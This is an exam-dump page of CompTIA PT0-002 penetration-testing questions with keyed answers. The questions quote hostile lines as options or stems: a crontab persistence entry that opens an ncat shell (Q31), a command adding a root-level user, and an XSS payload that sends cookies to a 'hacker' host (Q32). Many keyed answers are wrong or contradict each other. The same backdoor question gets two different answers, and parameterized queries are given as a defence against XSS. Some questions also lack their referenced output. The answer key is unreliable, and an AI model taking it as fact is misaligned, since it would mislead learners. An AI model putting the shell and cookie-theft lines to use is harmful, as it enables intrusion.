Verified PT0-002 exam dumps Q&As with Correct 142 Questions and Answers [Q14-Q37]


CompTIA PT0-002 Test Engine PDF - All Free Dumps from Exam-Killer

NEW QUESTION 14
A penetration tester performs the following command:
curl -I -http2 https://www.comptia.org
Which of the following snippets of output will the tester MOST likely receive?

  • A. Option D
  • B. Option C
  • C. Option B
  • D. Option A

Answer: D

 

NEW QUESTION 15
A penetration tester recently performed a social-engineering attack in which the tester found an employee of the target company at a local coffee shop and over time built a relationship with the employee. On the employee's birthday, the tester gave the employee an external hard drive as a gift. Which of the following social-engineering attacks was the tester utilizing?

  • A. Phishing
  • B. Shoulder surfing
  • C. Tailgating
  • D. Baiting

Answer: D

 

NEW QUESTION 16
A penetration tester wants to scan a target network without being detected by the client's IDS. Which of the following scans is MOST likely to avoid detection?

  • A. nmap -sA -sV --host-timeout 60 192.168.1.10
  • B. nmap -p0 -T0 -sS 192.168.1.10
  • C. nmap -A -n 192.168.1.10
  • D. nmap -f --badsum 192.168.1.10

Answer: A

 

NEW QUESTION 17
Running a vulnerability scanner on a hybrid network segment that includes general IT servers and industrial control systems:

  • A. may reduce the true positive rate of findings.
  • B. may cause unintended failures in control systems.
  • C. will create a denial-of-service condition on the IP networks.
  • D. will reveal vulnerabilities in the Modbus protocol.

Answer: B

 

NEW QUESTION 18
A penetration tester wrote the following script to be used in one engagement:

Which of the following actions will this script perform?

  • A. Look for open ports.
  • B. Listen for a reverse shell.
  • C. Create an encrypted tunnel.
  • D. Attempt to flood open ports.

Answer: A

 

NEW QUESTION 19
A penetration tester discovers that a web server within the scope of the engagement has already been compromised with a backdoor. Which of the following should the penetration tester do NEXT?

  • A. Continue the engagement and include the backdoor finding in the final report
  • B. Forensically acquire the backdoor Trojan and perform attribution
  • C. Utilize the backdoor in support of the engagement
  • D. Inform the customer immediately about the backdoor

Answer: A

 

NEW QUESTION 20
A penetration tester was brute forcing an internal web server and ran a command that produced the following output:

However, when the penetration tester tried to browse the URL http://172.16.100.10:3000/profile, a blank page was displayed.
Which of the following is the MOST likely reason for the lack of output?

  • A. The tester did not run sudo before the command.
  • B. This URI returned a server error.
  • C. The web server is using HTTPS instead of HTTP.
  • D. The HTTP port is not open on the firewall.

Answer: D

 

NEW QUESTION 21
A software company has hired a penetration tester to perform a penetration test on a database server. The tester has been given a variety of tools used by the company's privacy policy. Which of the following would be the BEST to use to find vulnerabilities on this server?

  • A. Nikto
  • B. OpenVAS
  • C. Nessus
  • D. SQLmap

Answer: D

 

NEW QUESTION 22
In an unprotected network file repository, a penetration tester discovers a text file containing usernames and passwords in cleartext and a spreadsheet containing data for 50 employees, including full names, roles, and serial numbers. The tester realizes some of the passwords in the text file follow the format: <name-serial_number>. Which of the following would be the best action for the tester to take NEXT with this information?

  • A. Document the unprotected file repository as a finding in the penetration-testing report.
  • B. Recommend configuring password complexity rules in all the systems and applications.
  • C. Create a custom password dictionary as preparation for password spray testing.
  • D. Recommend using a password manager/vault instead of text files to store passwords securely.

Answer: A

 

NEW QUESTION 23
A penetration tester is preparing to perform activities for a client that requires minimal disruption to company operations. Which of the following are considered passive reconnaissance tools? (Choose two.)

  • A. Retina
  • B. Shodan
  • C. Nikto
  • D. Burp Suite
  • E. Nessus
  • F. Wireshark

Answer: B,F

 

NEW QUESTION 24
A client wants a security assessment company to perform a penetration test against its hot site. The purpose of the test is to determine the effectiveness of the defenses that protect against disruptions to business continuity. Which of the following is the MOST important action to take before starting this type of assessment?

  • A. Establish communication and escalation procedures with the client.
  • B. Verify the client has granted network access to the hot site.
  • C. Ensure the client has signed the SOW.
  • D. Determine if the failover environment relies on resources not owned by the client.

Answer: D

 

NEW QUESTION 25
Which of the following types of information should be included when writing the remediation section of a penetration test report to be viewed by the systems administrator and technical staff?

  • A. The rules of engagement from the assessment
  • B. The executive summary and information regarding the testing company
  • C. A quick description of the vulnerability and a high-level control to fix it
  • D. Information regarding the business impact if compromised

Answer: D

 

NEW QUESTION 26
A penetration tester discovers that a web server within the scope of the engagement has already been compromised with a backdoor. Which of the following should the penetration tester do NEXT?

  • A. Continue the engagement and include the backdoor finding in the final report
  • B. Inform the customer immediately about the backdoor
  • C. Forensically acquire the backdoor Trojan and perform attribution
  • D. Utilize the backdoor in support of the engagement

Answer: B

 

NEW QUESTION 27
A penetration tester wants to perform reconnaissance without being detected. Which of the following activities have a MINIMAL chance of detection? (Choose two.)

  • A. A vulnerability scan
  • B. Port knocking
  • C. A ping sweep
  • D. An Nmap scan
  • E. Traffic sniffing
  • F. Open-source research

Answer: A,D

 

NEW QUESTION 28
A penetration tester has been given an assignment to attack a series of targets in the 192.168.1.0/24 range, triggering as few alarms and countermeasures as possible.
Which of the following Nmap scan syntaxes would BEST accomplish this objective?

  • A. nmap -sV 192.168.1.2/24 -PO
  • B. nmap -sT -vvv -O 192.168.1.2/24 -PO
  • C. nmap -sS -O 192.168.1.2/24 -T1
  • D. nmap -sA -v -O 192.168.1.2/24

Answer: C

 

NEW QUESTION 29
A compliance-based penetration test is primarily concerned with:

  • A. obtaining PII from the protected network.
  • B. obtaining specific information from the protected network.
  • C. bypassing protection on edge devices.
  • D. determining the efficacy of a specific set of security standards.

Answer: D

 

NEW QUESTION 30
A security professional wants to test an IoT device by sending an invalid packet to a proprietary service listening on TCP port 3011. Which of the following would allow the security professional to easily and programmatically manipulate the TCP header length and checksum using arbitrary numbers and to observe how the proprietary service responds?

  • A. Nmap
  • B. tcpdump
  • C. Scapy
  • D. hping3

Answer: A

 

NEW QUESTION 31
A penetration tester was able to gain access successfully to a Windows workstation on a mobile client's laptop. Which of the following can be used to ensure the tester is able to maintain access to the system?

  • A. sudo useradd -ou 0 -g 0 user
  • B. wmic startup get caption,command
  • C. crontab -l; echo "@reboot sleep 200 && ncat -lvp 4242 -e /bin/bash") | crontab 2>/dev/null
  • D. schtasks /create /sc /ONSTART /tr C:\Temp\WindowsUpdate.exe

Answer: B

 

NEW QUESTION 32
Given the following code:
<SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20document.cookie;</SCRIPT>
Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)

  • A. Session tokens
  • B. Parameterized queries
  • C. Web-application firewall
  • D. Output encoding
  • E. Base64 encoding
  • F. Input validation

Answer: B,F

 

NEW QUESTION 33
A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running. Which of the following would BEST support this task?

  • A. Run nmap with the --script vulners option set against the target
  • B. Run nmap with the -sV and -p22 options set against the target
  • C. Run nmap with the -sA option set against the target
  • D. Run nmap with the -o, -p22, and -sC options set against the target

Answer: C

 

NEW QUESTION 34
A company that requires minimal disruption to its daily activities needs a penetration tester to perform information gathering around the company's web presence. Which of the following would the tester find MOST helpful in the initial information-gathering steps? (Choose two.)

  • A. Shodan results
  • B. Externally facing open ports
  • C. IP addresses and subdomains
  • D. DNS forward and reverse lookups
  • E. Zone transfers
  • F. Internet search engines

Answer: C,E

 

NEW QUESTION 35
During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan.
INSTRUCTIONS
Analyze the code segments to determine which sections are needed to complete a port scanning script.
Drag the appropriate elements into the correct locations to complete the script.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Answer:


 

NEW QUESTION 36
A penetration tester was conducting a penetration test and discovered the network traffic was no longer reaching the client's IP address. The tester later discovered the SOC had used sinkholing on the penetration tester's IP address. Which of the following BEST describes what happened?

  • A. The client was not ready for the assessment to start
  • B. The penetration tester had incorrect contact information
  • C. The planning process failed to ensure all teams were notified
  • D. The penetration tester was testing the wrong assets

Answer: C

 

NEW QUESTION 37
......
